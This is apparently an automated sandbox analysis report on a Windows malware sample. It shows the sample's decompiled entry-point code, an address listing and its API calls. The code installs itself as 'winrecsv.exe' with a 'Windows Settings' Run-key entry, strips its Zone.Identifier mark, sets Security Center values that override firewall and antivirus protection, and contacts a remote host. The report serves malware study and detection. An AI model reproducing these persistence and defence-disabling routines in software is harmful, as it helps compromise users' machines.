• Instruction ID: e9994f08d7126ec26206465890822c5d7dfef59af955b2bd7cc84378f3fe3710
• Opcode Fuzzy Hash: 611403d475bc268a560fb48b2f5e81d27d633618192b5c869a563e9a8d5f4499
• Instruction Fuzzy Hash: 92114C74D0824D9FDF11CFE4C8447FEBBB1AB5A314F04829AD861362C1C3785A4ACBA6
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (graph image for _entry_; legend: Executed / Not Executed)
C-Code - Quality: 98%
// Decompiler output for the sample's entry point (listing continues below).
_entry_() {
	short _v524;
	char _v528;
	int _v532;
	int _v536;
	char _v1060;
	void* _v1064;
	char _v1588;
	short _v2108;
	intOrPtr _v2112;
	short _v2636;
	void* _v2640;
	struct HWND__* _v2644;
	long _v2648;
	struct HWND__* _v2652;
	void* _v2656;
	intOrPtr _v2660;
	long _v2664;
	void* _v2668;
	intOrPtr _v2672;
	intOrPtr _v2676;
	struct HWND__* _v2680;
	int _v2684;
	int _v2688;
	struct HWND__* _v2692;
	struct HWND__* _v2696;
	int _v2700;
	char _v3100;
	intOrPtr* _v3104;
	int _v3108;
	short _v3110;
	short _v3112;
	int _v3116;
	int _v3120;
	intOrPtr* _v3124;
	intOrPtr _v3128;
	short _v3130;
	signed int _v3136;
	intOrPtr* _v3140;
	intOrPtr _v3144;
	short _v3146;
	signed int _v3152;
	void* _t182;
	int _t190;
	intOrPtr _t210;
	signed char _t240;
	int _t245;
	signed char _t253;
	long _t263;
	signed char _t264;
	struct HWND__* _t271;
	short _t367;
	intOrPtr _t371;
	short _t397;
	intOrPtr _t413;
	intOrPtr _t414;
	void* _t446;
	void* _t447;
	void* _t454;

	Sleep(0x1b58); // executed (7 s initial delay)
	_v536 = 0;
	_v2112 = 0x2332; // loop bound: up to 9010 polling iterations
	// Poll for a window with the hard-coded class/name below; when one is
	// found, pause one second and attempt the file renames.
	while(_v536 < _v2112) {
		_t271 = FindWindowA("579795729858927452784", 0); // executed
		_v2644 = _t271;
		if(_v2644 == 0) {
			L40:
			_v536 = _v536 + 1;
			continue;
		}
		Sleep(0x3e8);
		MoveFileA("feu8gf8g2gf8g2fg", "579795729858927452784");
		MoveFileA("feu8gf8g2gf8g2fg", "579795729858927452784");
                                                                                  					_v2680 = FindWindowA("579795729858927452784", 0);
                                                                                  					if(_v2680 != 0) {
                                                                                  						Sleep(0x3e8);
                                                                                  						MoveFileA("feu8gf8g2gf8g2fg", "579795729858927452784");
                                                                                  					}
                                                                                  					Sleep(0x3e8);
                                                                                  					_v2684 = 0;
                                                                                  					while(_v2684 < 0x7d0) {
                                                                                  						DeleteFileW(L"argarhargafafargh");
                                                                                  						MoveFileW(L"4yy4w4yw4fwgwgw", L"ffag8f2g8fg82g8f8g8fg");
                                                                                  						Sleep(0xbb8);
                                                                                  						DeleteFileW(L"argarhargafafargh");
                                                                                  						MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  						MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  						Sleep(0xfa0);
                                                                                  						DeleteFileA("579795729858927452784");
                                                                                  						_v2684 = _v2684 + 1;
                                                                                  					}
                                                                                  					DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  					MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  					DeleteFileW(L"argarhargafafargh");
                                                                                  					MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  					DeleteFileW(L"argarhargafafargh");
                                                                                  					Sleep(0xbb8);
                                                                                  					Sleep(0xbb8);
                                                                                  					_v2668 = InternetOpenA("ttyu8ruy8uy8u8yu", 0, 0, 0, 0);
                                                                                  					DeleteFileW(L"ffag8f2g8fg82g8f8g8fg");
                                                                                  					if(_v2668 == 0) {
                                                                                  						L16:
                                                                                  						Sleep(0x7d0);
                                                                                  						InternetCloseHandle(_v2668);
                                                                                  						Sleep(0x2710);
                                                                                  						ShowWindow(_v2644, 1);
                                                                                  						SetForegroundWindow(_v2644);
                                                                                  						MoveFileA("579795729858927452784", "2dgd828d8g8fg8g8g");
                                                                                  						_v2676 = 0x37;
                                                                                  						_v2660 = 0x2c;
                                                                                  						_v2672 = _v2676 + _v2660;
                                                                                  						if(_v2672 < 0x2328) {
                                                                                  							MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  							DeleteFileW(L"argarhargafafargh");
                                                                                  							MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  							Sleep(0x7d0);
                                                                                  							DeleteFileA("2dgd828d8g8fg8g8g");
                                                                                  							_v2692 = FindWindowA("aefafugaugfgauegf", 0);
                                                                                  							_v2668 = InternetOpenA("ttyu8ruy8uy8u8yu", 0, 0, 0, 0);
                                                                                  							if(_v2668 != 0) {
                                                                                  								MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  								MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  								_v2656 = InternetOpenUrlA(_v2668, "http://2462462645.fr/", 0, 0, 0, 0);
                                                                                  								if(_v2656 != 0) {
                                                                                  									DeleteFileW(L"argarhargafafargh");
                                                                                  									Sleep(0x1388);
                                                                                  									DeleteFileA("579795729858927452784");
                                                                                  									MoveFileW(L"4yy4w4yw4fwgwgw", L"argarhrharharfafrahth");
                                                                                  									Sleep(0xfa0);
                                                                                  									DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  								}
                                                                                  								InternetCloseHandle(_v2656);
                                                                                  								Sleep(0xdac);
                                                                                  							}
                                                                                  							InternetCloseHandle(_v2668);
                                                                                  							Sleep(0xfa0);
                                                                                  							if(_v2692 != 0) {
                                                                                  								ShowWindow(_v2692, 0);
                                                                                  								DeleteFileW(L"argarhargafafargh");
                                                                                  								SetForegroundWindow(_v2692);
                                                                                  								Sleep(0x1388);
                                                                                  								_v2668 = InternetOpenA("ttyu8ruy8uy8u8yu", 0, 0, 0, 0);
                                                                                  								if(_v2668 != 0) {
                                                                                  									_v2656 = InternetOpenUrlA(_v2668, "http://2462462645.fr/", 0, 0, 0, 0);
                                                                                  									if(_v2656 != 0) {
                                                                                  										MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  										Sleep(0x2710);
                                                                                  										DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  									}
                                                                                  									InternetCloseHandle(_v2656);
                                                                                  									DeleteFileW(L"argarhargafafargh");
                                                                                  									Sleep(0x64);
                                                                                  									MoveFileA("feu8gf8g2gf8g2fg", "579795729858927452784");
                                                                                  									DeleteFileW(L"argarhargafafargh");
                                                                                  									MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  									DeleteFileA("2dgd828d8g8fg8g8g");
                                                                                  								}
                                                                                  								InternetCloseHandle(_v2668);
                                                                                  							}
                                                                                  						}
                                                                                  						_v2664 = 0x1388;
                                                                                  						_v2648 = 0x1f4;
                                                                                  						while(_v2664 > _v2648) {
                                                                                  							_v2696 = FindWindowA("2dgd828d8g8fg8g8g", 0);
                                                                                  							if(_v2696 != 0) {
                                                                                  								Sleep(0x7d0);
                                                                                  								DeleteFileW(L"argarhargafafargh");
                                                                                  								MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  								Sleep(0x1388);
                                                                                  								Sleep(0x1388);
                                                                                  								_v2648 = _v2648 + 1;
                                                                                  							}
                                                                                  						}
                                                                                  						if(PathFileExistsA("aefafugaugfgauegf") != 0) {
                                                                                  							DeleteFileA("579795729858927452784");
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							Sleep(0x1f4);
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							MoveFileW(L"4yy4w4yw4fwgwgw", L"ffag8f2g8fg82g8f8g8fg");
                                                                                  						}
                                                                                  						_v2652 = FindWindowA("aefyaiegfayegfg", 0);
                                                                                  						if(_v2652 != 0) {
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							SetForegroundWindow(_v2644);
                                                                                  							ShowWindow(_v2644, 1);
                                                                                  							Sleep(0x3a98);
                                                                                  							MoveFileA("feu8gf8g2gf8g2fg", "aefafugaugfgauegf");
                                                                                  							DeleteFileA("579795729858927452784");
                                                                                  							Sleep(0x1f4);
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							DeleteFileW(L"argarhargafafargh");
                                                                                  						}
                                                                                  						_v2700 = 0;
                                                                                  						while(_v2700 < 0xfa0) {
                                                                                  							MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							Sleep(0x2328);
                                                                                  							MoveFileW(L"argarhrharharfafrahth", L"4yy4w4yw4fwgwgw");
                                                                                  							_v2700 = _v2700 + 1;
                                                                                  						}
                                                                                  						goto L40;
                                                                                  					}
                                                                                  					DeleteFileW(L"argarhargafafargh");
                                                                                  					MoveFileA("feu8gf8g2gf8g2fg", "579795729858927452784");
                                                                                  					Sleep(0x1388);
                                                                                  					DeleteFileW(L"ffag8f2g8fg82g8f8g8fg");
                                                                                  					Sleep(0xbb8);
                                                                                  					DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  					_v2656 = InternetOpenUrlA(_v2668, "http://2462462645.fr/", 0, 0, 0, 0);
                                                                                  					Sleep(0xbb8);
                                                                                  					if(_v2656 == 0) {
                                                                                  						L15:
                                                                                  						InternetCloseHandle(_v2656);
                                                                                  						DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  						goto L16;
                                                                                  					}
                                                                                  					_v2688 = 0;
                                                                                  					while(_v2688 < 0x7d0) {
                                                                                  						MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  						Sleep(0x7d0);
                                                                                  						MoveFileA("feu8gf8g2gf8g2fg", "579795729858927452784");
                                                                                  						Sleep(0xfa0);
                                                                                  						_v2688 = _v2688 + 1;
                                                                                  					}
                                                                                  					goto L15;
                                                                                  				}
                                                                                  				_t182 = CreateMutexA(0, 0, "984658"); // executed
                                                                                  				_v2640 = _t182;
                                                                                  				if(GetLastError() != 0xb7) {
                                                                                  					_v1064 = 0;
                                                                                  					_v528 = 1;
                                                                                  					GetModuleFileNameW(0, "C:\Users\frontdesk\Desktop\Id4zlrsrZ4.exe", 0x105);
                                                                                  					_v532 = PathFindFileNameW("C:\Users\frontdesk\Desktop\Id4zlrsrZ4.exe");
                                                                                  					wsprintfW( &_v524, L"%s:Zone.Identifier", "C:\Users\frontdesk\Desktop\Id4zlrsrZ4.exe");
                                                                                  					_t447 = _t446 + 0xc;
                                                                                  					DeleteFileW( &_v524); // executed
                                                                                  					ExpandEnvironmentStringsW(L"%userprofile%",  &_v2636, 0x104);
                                                                                  					_v3104 = L"winrecsv.exe";
                                                                                  					_v3108 = _v532;
                                                                                  					while(1) {
                                                                                  						_t190 = _v3108;
                                                                                  						_t367 =  *_t190;
                                                                                  						_v3110 = _t367;
                                                                                  						if(_t367 !=  *_v3104) {
                                                                                  							break;
                                                                                  						}
                                                                                  						if(_v3110 == 0) {
                                                                                  							L48:
                                                                                  							_v3116 = 0;
                                                                                  							L50:
                                                                                  							_v3120 = _v3116;
                                                                                  							if(_v3120 == 0) {
                                                                                  								L67:
                                                                                  								Sleep(0x1f4);
                                                                                  								if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Security Center", 0, 0x20006,  &_v1064) == 0) {
                                                                                  									RegSetValueExA(_v1064, "FirewallOverride", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "FirewallDisableNotify", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "AntiSpywareOverride", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "AntiVirusOverride", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "AntiVirusDisableNotify", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "UpdatesOverride", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "UpdatesDisableNotify", 0, 4,  &_v528, 4);
                                                                                  									RegCloseKey(_v1064);
                                                                                  								}
                                                                                  								if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Security Center\\Svc", 0, 0x20006,  &_v1064) == 0) {
                                                                                  									RegSetValueExA(_v1064, "FirewallOverride", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "FirewallDisableNotify", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "AntiSpywareOverride", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "AntiVirusOverride", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "AntiVirusDisableNotify", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "UpdatesOverride", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "UpdatesDisableNotify", 0, 4,  &_v528, 4);
                                                                                  									RegCloseKey(_v1064);
                                                                                  								}
                                                                                  								Sleep(0x1f4);
                                                                                  								if((E0040B4A0() & 0x000000ff) != 0) {
                                                                                  									__imp__#115(0x202,  &_v3100);
                                                                                  									wsprintfW(0x414c40, L"%s\\tnnodes.dat",  &_v2636);
                                                                                  									wsprintfW(0x414620, L"%s\\tncmds.dat",  &_v2636);
                                                                                  									CreateThread(0, 0, E00404000, 0, 0, 0);
                                                                                  									Sleep(0x1f4);
                                                                                  									CreateThread(0, 0, E004050B0, 0, 0, 0);
                                                                                  									Sleep(0x1f4);
                                                                                  									CreateThread(0, 0, E00405900, 0, 0, 0);
                                                                                  									Sleep(0x2710);
                                                                                  									E00404200();
                                                                                  									E004057B0(E0040D3D0(),  &_v2636);
                                                                                  									 *0x414e64 = CreateEventA(0, 1, 0, 0);
                                                                                  									 *0x414e6c = E0040ABD0( &_v2636);
                                                                                  									 *0x414e68 = E0040BEA0( &_v2636);
                                                                                  									E0040A020();
                                                                                  									_t413 =  *0x414e68; // 0x0
                                                                                  									E0040BF50(_t413, 0, E0040C360, 0, 0, 0);
                                                                                  									_t210 =  *0x414e68; // 0x0
                                                                                  									E0040BF50(_t210, 0, E0040C2C0, 0, 0, 0);
                                                                                  									_t371 =  *0x414e68; // 0x0
                                                                                  									E0040BF50(_t371, 0, E0040BE50, 0, 0, 0);
                                                                                  									_t414 =  *0x414e68; // 0x0
                                                                                  									E0040BF50(_t414, 0, E0040BC50, 0, 0, 0);
                                                                                  								}
                                                                                  								return 0;
                                                                                  							}
                                                                                  							_t240 = E0040D4A0(); // executed
                                                                                  							if((_t240 & 0x000000ff) != 1) {
                                                                                  								ExpandEnvironmentStringsW(L"%windir%",  &_v2108, 0x104);
                                                                                  								wsprintfW( &_v1588, L"%s\\%s",  &_v2108, L"winrecsv.exe");
                                                                                  								_t454 = _t447 + 0x10;
                                                                                  								_t245 = CopyFileW("C:\Users\frontdesk\Desktop\Id4zlrsrZ4.exe",  &_v1588, 0); // executed
                                                                                  								if(_t245 == 0) {
                                                                                  									L60:
                                                                                  									Sleep(0x1f4);
                                                                                  									wsprintfW( &_v1060, L"%s\\%s",  &_v2636, L"winrecsv.exe");
                                                                                  									_t447 = _t454 + 0x10;
                                                                                  									if(CopyFileW(?str?,  &_v1060, 0) == 0) {
                                                                                  										goto L67;
                                                                                  									}
                                                                                  									SetFileAttributesW( &_v1060, 3);
                                                                                  									if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 0, 0x20006,  &_v1064) != 0) {
                                                                                  										L65:
                                                                                  										_t253 = E0040D740( &_v1060);
                                                                                  										_t447 = _t447 + 4;
                                                                                  										if((_t253 & 0x000000ff) != 1) {
                                                                                  											goto L67;
                                                                                  										}
                                                                                  										ExitProcess(0);
                                                                                  									}
                                                                                  									_v3140 =  &_v1060;
                                                                                  									_v3144 = _v3140 + 2;
                                                                                  									do {
                                                                                  										_v3146 =  *_v3140;
                                                                                  										_v3140 = _v3140 + 2;
                                                                                  									} while (_v3146 != 0);
                                                                                  									_v3152 = _v3140 - _v3144 >> 1;
                                                                                  									RegSetValueExW(_v1064, L"Windows Settings", 0, 1,  &_v1060, _v3152 + _v3152 + 2);
                                                                                  									RegCloseKey(_v1064);
                                                                                  									goto L65;
                                                                                  								}
                                                                                  								SetFileAttributesW( &_v1588, 3); // executed
                                                                                  								_t263 = RegOpenKeyExW(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 0, 0x20006,  &_v1064); // executed
                                                                                  								if(_t263 != 0) {
                                                                                  									L58:
                                                                                  									_t264 = E0040D740( &_v1588); // executed
                                                                                  									_t454 = _t454 + 4;
                                                                                  									if((_t264 & 0x000000ff) != 1) {
                                                                                  										goto L60;
                                                                                  									}
                                                                                  									ExitProcess(0); // executed
                                                                                  								}
                                                                                  								_v3124 =  &_v1588;
                                                                                  								_v3128 = _v3124 + 2;
                                                                                  								do {
                                                                                  									_v3130 =  *_v3124;
                                                                                  									_v3124 = _v3124 + 2;
                                                                                  								} while (_v3130 != 0);
                                                                                  								_v3136 = _v3124 - _v3128 >> 1;
                                                                                  								RegSetValueExW(_v1064, L"Windows Settings", 0, 1,  &_v1588, _v3136 + _v3136 + 2); // executed
                                                                                  								RegCloseKey(_v1064);
                                                                                  								goto L58;
                                                                                  							}
                                                                                  							ExitProcess(0);
                                                                                  						}
                                                                                  						_t190 = _v3108;
                                                                                  						_t397 =  *((intOrPtr*)(_t190 + 2));
                                                                                  						_v3112 = _t397;
                                                                                  						_t86 = _v3104 + 2; // 0x6e0069
                                                                                  						if(_t397 !=  *_t86) {
                                                                                  							break;
                                                                                  						}
                                                                                  						_v3108 = _v3108 + 4;
                                                                                  						_v3104 = _v3104 + 4;
                                                                                  						if(_v3112 != 0) {
                                                                                  							continue;
                                                                                  						}
                                                                                  						goto L48;
                                                                                  					}
                                                                                  					asm("sbb eax, eax");
                                                                                  					asm("sbb eax, 0xffffffff");
                                                                                  					_v3116 = _t190;
                                                                                  					goto L50;
                                                                                  				}
                                                                                  				ExitProcess(0);
                                                                                  			}
                                                                                  0x00405a2e
                                                                                  0x00405a34
                                                                                  0x00405a3e
                                                                                  0x00405a48
                                                                                  0x00405a61
                                                                                  0x00405a67
                                                                                  0x00405a74
                                                                                  0x004061cb
                                                                                  0x004061d4
                                                                                  0x00000000
                                                                                  0x004061d4
                                                                                  0x00405a7f
                                                                                  0x00405a8f
                                                                                  0x00405a9f
                                                                                  0x00405ab2
                                                                                  0x00405abf
                                                                                  0x00405ac6
                                                                                  0x00405ad6
                                                                                  0x00405ad6
                                                                                  0x00405ae1
                                                                                  0x00405ae7
                                                                                  0x00405b02
                                                                                  0x00405b13
                                                                                  0x00405b23
                                                                                  0x00405b2e
                                                                                  0x00405b39
                                                                                  0x00405b49
                                                                                  0x00405b59
                                                                                  0x00405b64
                                                                                  0x00405b6f
                                                                                  0x00405afc
                                                                                  0x00405afc
                                                                                  0x00405b7f
                                                                                  0x00405b8f
                                                                                  0x00405b9a
                                                                                  0x00405baa
                                                                                  0x00405bb5
                                                                                  0x00405bc0
                                                                                  0x00405bcb
                                                                                  0x00405be4
                                                                                  0x00405bef
                                                                                  0x00405bfc
                                                                                  0x00405cf4
                                                                                  0x00405cf9
                                                                                  0x00405d06
                                                                                  0x00405d11
                                                                                  0x00405d20
                                                                                  0x00405d2d
                                                                                  0x00405d3d
                                                                                  0x00405d43
                                                                                  0x00405d4d
                                                                                  0x00405d63
                                                                                  0x00405d73
                                                                                  0x00405d83
                                                                                  0x00405d8e
                                                                                  0x00405d9e
                                                                                  0x00405da9
                                                                                  0x00405db4
                                                                                  0x00405dc7
                                                                                  0x00405de0
                                                                                  0x00405ded
                                                                                  0x00405dfd
                                                                                  0x00405e0d
                                                                                  0x00405e2d
                                                                                  0x00405e3a
                                                                                  0x00405e41
                                                                                  0x00405e4c
                                                                                  0x00405e57
                                                                                  0x00405e67
                                                                                  0x00405e72
                                                                                  0x00405e7d
                                                                                  0x00405e7d
                                                                                  0x00405e8a
                                                                                  0x00405e95
                                                                                  0x00405e95
                                                                                  0x00405ea2
                                                                                  0x00405ead
                                                                                  0x00405eba
                                                                                  0x00405ec9
                                                                                  0x00405ed4
                                                                                  0x00405ee1
                                                                                  0x00405eec
                                                                                  0x00405f05
                                                                                  0x00405f12
                                                                                  0x00405f32
                                                                                  0x00405f3f
                                                                                  0x00405f4b
                                                                                  0x00405f56
                                                                                  0x00405f61
                                                                                  0x00405f61
                                                                                  0x00405f6e
                                                                                  0x00405f79
                                                                                  0x00405f81
                                                                                  0x00405f91
                                                                                  0x00405f9c
                                                                                  0x00405fac
                                                                                  0x00405fb7
                                                                                  0x00405fb7
                                                                                  0x00405fc4
                                                                                  0x00405fc4
                                                                                  0x00405eba
                                                                                  0x00405fca
                                                                                  0x00405fd4
                                                                                  0x00405fde
                                                                                  0x00405ff9
                                                                                  0x00406006
                                                                                  0x0040600d
                                                                                  0x00406018
                                                                                  0x00406028
                                                                                  0x00406033
                                                                                  0x0040603e
                                                                                  0x0040604d
                                                                                  0x0040604d
                                                                                  0x00406053
                                                                                  0x00406062
                                                                                  0x00406069
                                                                                  0x00406074
                                                                                  0x0040607f
                                                                                  0x0040608a
                                                                                  0x00406095
                                                                                  0x004060a0
                                                                                  0x004060ab
                                                                                  0x004060b6
                                                                                  0x004060c1
                                                                                  0x004060d1
                                                                                  0x004060d1
                                                                                  0x004060e4
                                                                                  0x004060f1
                                                                                  0x004060f8
                                                                                  0x00406105
                                                                                  0x00406114
                                                                                  0x0040611f
                                                                                  0x0040612f
                                                                                  0x0040613a
                                                                                  0x00406145
                                                                                  0x00406150
                                                                                  0x0040615b
                                                                                  0x00406166
                                                                                  0x00406166
                                                                                  0x0040616c
                                                                                  0x00406187
                                                                                  0x0040619d
                                                                                  0x004061a8
                                                                                  0x004061b3
                                                                                  0x004061c3
                                                                                  0x00406181
                                                                                  0x00406181
                                                                                  0x00000000
                                                                                  0x00406187
                                                                                  0x00405c07
                                                                                  0x00405c17
                                                                                  0x00405c22
                                                                                  0x00405c2d
                                                                                  0x00405c38
                                                                                  0x00405c43
                                                                                  0x00405c63
                                                                                  0x00405c6e
                                                                                  0x00405c7b
                                                                                  0x00405cdc
                                                                                  0x00405ce3
                                                                                  0x00405cee
                                                                                  0x00000000
                                                                                  0x00405cee
                                                                                  0x00405c7d
                                                                                  0x00405c98
                                                                                  0x00405cae
                                                                                  0x00405cb9
                                                                                  0x00405cc9
                                                                                  0x00405cd4
                                                                                  0x00405c92
                                                                                  0x00405c92
                                                                                  0x00000000
                                                                                  0x00405c98
                                                                                  0x004061e8
                                                                                  0x004061ee
                                                                                  0x004061ff
                                                                                  0x00406209
                                                                                  0x00406213
                                                                                  0x00406229
                                                                                  0x0040623a
                                                                                  0x00406251
                                                                                  0x00406257
                                                                                  0x00406261
                                                                                  0x00406278
                                                                                  0x0040627e
                                                                                  0x0040628e
                                                                                  0x00406294
                                                                                  0x00406294
                                                                                  0x0040629a
                                                                                  0x0040629d
                                                                                  0x004062ad
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004062b7
                                                                                  0x004062ee
                                                                                  0x004062ee
                                                                                  0x00406305
                                                                                  0x0040630b
                                                                                  0x00406318
                                                                                  0x00406581
                                                                                  0x00406586
                                                                                  0x004065ac
                                                                                  0x004065cb
                                                                                  0x004065ea
                                                                                  0x00406609
                                                                                  0x00406628
                                                                                  0x00406647
                                                                                  0x00406666
                                                                                  0x00406685
                                                                                  0x00406692
                                                                                  0x00406692
                                                                                  0x004066b8
                                                                                  0x004066d7
                                                                                  0x004066f6
                                                                                  0x00406715
                                                                                  0x00406734
                                                                                  0x00406753
                                                                                  0x00406772
                                                                                  0x00406791
                                                                                  0x0040679e
                                                                                  0x0040679e
                                                                                  0x004067a9
                                                                                  0x004067b9
                                                                                  0x004067cb
                                                                                  0x004067e2
                                                                                  0x004067fc
                                                                                  0x00406814
                                                                                  0x0040681f
                                                                                  0x00406834
                                                                                  0x0040683f
                                                                                  0x00406854
                                                                                  0x0040685f
                                                                                  0x00406865
                                                                                  0x0040686f
                                                                                  0x00406882
                                                                                  0x0040688c
                                                                                  0x00406896
                                                                                  0x0040689b
                                                                                  0x004068ad
                                                                                  0x004068b4
                                                                                  0x004068c9
                                                                                  0x004068cf
                                                                                  0x004068e4
                                                                                  0x004068eb
                                                                                  0x00406900
                                                                                  0x00406907
                                                                                   [Address column of the disassembly listing for this function (basic-block addresses between 0x00406203 and 0x0040690c, with 0x00000000 placeholders); the instruction text next to each address is not present on this page.]

                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(00001B58), ref: 00405A2E
                                                                                  • FindWindowA.USER32 ref: 00405A61
                                                                                  • Sleep.KERNEL32(000003E8), ref: 00405A7F
                                                                                  • MoveFileA.KERNEL32 ref: 00405A8F
                                                                                  • MoveFileA.KERNEL32 ref: 00405A9F
                                                                                  • FindWindowA.USER32 ref: 00405AAC
                                                                                  • Sleep.KERNEL32(000003E8), ref: 00405AC6
                                                                                  • MoveFileA.KERNEL32 ref: 00405AD6
                                                                                  • Sleep.KERNEL32(000003E8), ref: 00405AE1
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405B13
                                                                                  • MoveFileW.KERNEL32(4yy4w4yw4fwgwgw,ffag8f2g8fg82g8f8g8fg), ref: 00405B23
                                                                                  • Sleep.KERNEL32(00000BB8), ref: 00405B2E
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405B39
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405B49
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405B59
                                                                                  • Sleep.KERNEL32(00000FA0), ref: 00405B64
                                                                                  • DeleteFileA.KERNEL32(579795729858927452784), ref: 00405B6F
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00405B7F
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405B8F
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405B9A
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405BAA
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405BB5
                                                                                  • Sleep.KERNEL32(00000BB8), ref: 00405BC0
                                                                                  • Sleep.KERNEL32(00000BB8), ref: 00405BCB
                                                                                  • InternetOpenA.WININET(ttyu8ruy8uy8u8yu,00000000,00000000,00000000,00000000), ref: 00405BDE
                                                                                  • DeleteFileW.KERNEL32(ffag8f2g8fg82g8f8g8fg), ref: 00405BEF
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405C07
                                                                                  • MoveFileA.KERNEL32 ref: 00405C17
                                                                                  • Sleep.KERNEL32(00001388), ref: 00405C22
                                                                                  • DeleteFileW.KERNEL32(ffag8f2g8fg82g8f8g8fg), ref: 00405C2D
                                                                                  • Sleep.KERNEL32(00000BB8), ref: 00405C38
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00405C43
                                                                                  • InternetOpenUrlA.WININET(00000000,http://2462462645.fr/,00000000,00000000,00000000,00000000), ref: 00405C5D
                                                                                  • Sleep.KERNEL32(00000BB8), ref: 00405C6E
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405CAE
                                                                                  • Sleep.KERNEL32(000007D0), ref: 00405CB9
                                                                                  • MoveFileA.KERNEL32 ref: 00405CC9
                                                                                  • Sleep.KERNEL32(00000FA0), ref: 00405CD4
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405CE3
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00405CEE
                                                                                  • Sleep.KERNEL32(000007D0), ref: 00405CF9
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405D06
                                                                                  • Sleep.KERNEL32(00002710), ref: 00405D11
                                                                                  • ShowWindow.USER32(00000000,00000001), ref: 00405D20
                                                                                  • SetForegroundWindow.USER32(00000000), ref: 00405D2D
                                                                                  • MoveFileA.KERNEL32 ref: 00405D3D
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405D83
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405D8E
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405D9E
                                                                                  • Sleep.KERNEL32(000007D0), ref: 00405DA9
                                                                                  • DeleteFileA.KERNEL32(2dgd828d8g8fg8g8g), ref: 00405DB4
                                                                                  • FindWindowA.USER32 ref: 00405DC1
                                                                                  • InternetOpenA.WININET(ttyu8ruy8uy8u8yu,00000000,00000000,00000000,00000000), ref: 00405DDA
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405DFD
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405E0D
                                                                                  • InternetOpenUrlA.WININET(00000000,http://2462462645.fr/,00000000,00000000,00000000,00000000), ref: 00405E27
